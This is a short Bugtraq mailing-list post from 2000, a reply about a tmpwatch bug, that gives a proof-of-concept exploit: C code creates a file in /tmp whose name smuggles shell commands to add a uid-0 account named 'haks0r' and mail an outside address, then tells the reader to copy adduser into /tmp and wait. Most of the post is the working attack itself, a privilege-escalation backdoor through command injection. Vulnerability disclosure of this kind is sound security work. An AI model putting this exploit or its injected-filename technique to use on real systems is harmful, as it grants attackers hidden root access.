[17104] in bugtraq
Re: tmpwatch executes shell commands
daemon@ATHENA.MIT.EDU (Alexander Y. Yurchenko)
Mon Oct 9 14:13:30 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSO.4.21.0010092216390.32268-100000@disorder.rt.mipt.ru>
Date: Mon, 9 Oct 2000 22:28:02 +0400
Reply-To: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
From: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
Here is a simple example of my playing with tmpwatch bug
1. Execute following in /tmp
#include <stdio.h>
int main()
{
FILE *f;
char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
haks0r@somehost.com<blablabla";
if((f = fopen(filename, "a")) == 0) {
perror("Could not create file");
exit(1);
}
close(f);
}
2. cp /usr/sbin/adduser /tmp
3. Just wait for mail ;-)
---<*>---
grange
